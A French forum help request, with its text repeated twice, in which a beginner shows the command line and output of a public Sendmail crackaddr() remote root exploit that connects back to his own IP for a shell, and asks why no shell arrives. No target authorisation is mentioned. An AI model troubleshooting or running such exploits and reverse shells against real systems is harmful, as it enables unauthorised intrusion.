Bug avec remote exploits
vreezver
Messages postés
5
Statut
Membre
-
vreezver Messages postés 5 Statut Membre -
vreezver Messages postés 5 Statut Membre -
Bonjour,
je suis debutant dans la securite informatique.
je m'interesse surtout aux exploits et a l'intrusion reseau.
je suis presentement en train de tester le bug (crackaddr()) en remote du sendmail 8.10.x.
voici mon probleme:
--------------------------------
vreezver@Linux:[$] ./exploit <target_ip> <mon_ip> <targer_number> # ici le target number est 0
Sendmail <8.12.8 crackaddr() exploit by bysin
from the l33tsecurity crew
Resolving address... Address found
Connecting... Connected!
Sending exploit... Exploit sent!
Waiting for root prompt... # Ensuite plus rien... J'ai beau faire un netcat, en vain.
vreezver@Linux:[$]
-------------------------------------------------------
je pense que le probleme vient du fait que je travaille a partir d'un reseau local et que je recois la connexion internet d'un serveur.
-peut etre que le "root prompt" est bloqué par un firewall (le notre peut etre ou celui du target)
-peut etre que c'est le fait que le "mon_ip" n'est pas le bon, car je ne sais pas si je devrais utiliser le IP externe de ma machine ou celui du LAN.
La question centrale est : "Est ce que je recois vraiment le shell? si oui pourquoi je n'arrive pas a l'utiliser?"
Merci de votre interet a me repondre et si possible envoyez moi la reponse par mail
vreezver@yahoo.fr
je suis debutant dans la securite informatique.
je m'interesse surtout aux exploits et a l'intrusion reseau.
je suis presentement en train de tester le bug (crackaddr()) en remote du sendmail 8.10.x.
voici mon probleme:
--------------------------------
vreezver@Linux:[$] ./exploit <target_ip> <mon_ip> <targer_number> # ici le target number est 0
Sendmail <8.12.8 crackaddr() exploit by bysin
from the l33tsecurity crew
Resolving address... Address found
Connecting... Connected!
Sending exploit... Exploit sent!
Waiting for root prompt... # Ensuite plus rien... J'ai beau faire un netcat, en vain.
vreezver@Linux:[$]
-------------------------------------------------------
je pense que le probleme vient du fait que je travaille a partir d'un reseau local et que je recois la connexion internet d'un serveur.
-peut etre que le "root prompt" est bloqué par un firewall (le notre peut etre ou celui du target)
-peut etre que c'est le fait que le "mon_ip" n'est pas le bon, car je ne sais pas si je devrais utiliser le IP externe de ma machine ou celui du LAN.
La question centrale est : "Est ce que je recois vraiment le shell? si oui pourquoi je n'arrive pas a l'utiliser?"
Merci de votre interet a me repondre et si possible envoyez moi la reponse par mail
vreezver@yahoo.fr
A voir également:
- Bug avec remote exploits
- Bug chromecast - Guide
- Dameware mini remote control - Télécharger - Web & Internet
- Iptv bug ✓ - Forum TV & Vidéo
- Bug outlook - Guide
- Total bug caf - Guide